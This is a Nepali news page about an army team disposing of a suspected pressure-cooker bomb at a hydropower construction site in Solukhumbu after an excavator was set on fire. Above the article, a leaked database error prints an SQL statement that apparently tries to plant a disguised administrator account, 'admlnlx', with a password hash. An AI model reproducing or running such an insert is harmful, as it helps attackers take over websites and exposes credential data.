WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3UNn.onoPKDzCxkxKBTnI35/JHiUL/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 19:55:56', '', 'admlnlx', 'admlnlx')

सोलुखोलामा राखिएको प्रेसर कुकर ठुलो आवाज सहित डिस्पोज – Gaule Khabar

सोलुखोलामा राखिएको प्रेसर कुकर ठुलो आवाज सहित डिस्पोज

सोलुखोलामा राखिएको प्रेसर कुकर ठुलो आवाज सहित डिस्पोज

गाउँले न्यूज, २ असार, सोलुखुम्बु । सोलुदुधकुण्ड नगरपालिका ११ भदौरे स्थित सोलुखोला दुधकोशी ८६ मेगावाट क्षमताको निर्माणाधिन हाईडोपावरको परिसरमा सकांस्पद अवस्थामा राखिएको प्रेसरकुकर निष्कृय पारिएको छ ।
शनिबार राती स्काभेटरमा आगजनी गरि नजिकै राखिएको प्रेसरकुकर सोमबार विहान ९ बजेर १२ मिनेटमा निष्कृय पारिएको प्रहरी निरिक्षक उत्तम कार्कीले बताए । उक्त बस्तु ठुलो आवाज सहित विश्पोज गरिएको छ । तर सो बस्तु बम नै हो वा होईन भन्ने यकिन हुन अलिक समय लाग्ने प्रहरी निरिक्षक कार्कीले बताए ।
आईतबार फेला परेको शकांस्पद बस्तु प्रेसरकुकर निष्कृय गर्न उदयपुरबाट नेपाली सेनाको डिस्पोजल टोलि सोलुखुम्बु आएको हो । आईतबार उद्धयपुरबाट हिडेको डिस्पोजल टोली सोमबार बिहान घटनास्थल पुगेसङै डिस्पोज गरिएको प्रहरीले जनाएको छ ।
निर्माणाधिन हाईड्रोपावरमा प्रयोग गरिएको स्काभेटरमा शनिबार अज्ञात समुहले आगजनी गरेको थियो । अज्ञात समुहले गरेको आगजनीबाट स्काभेटरको बाहिरी भाग जलेर नष्ट भएको प्रहरीले जनाएको छ । जिल्ला प्रहरी कार्यलय सोलुखुम्बुबाट प्रहरी निरिक्षक उत्तम कार्कीको कमाण्डमा खटिएको टोलीले घटनाको विषयमा अनुसन्धान थालेको प्रहरीले जनाएको छ । घटना कसले र के कारणले घटाएको हो भन्ने बारे खुल्न सकेको छैन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका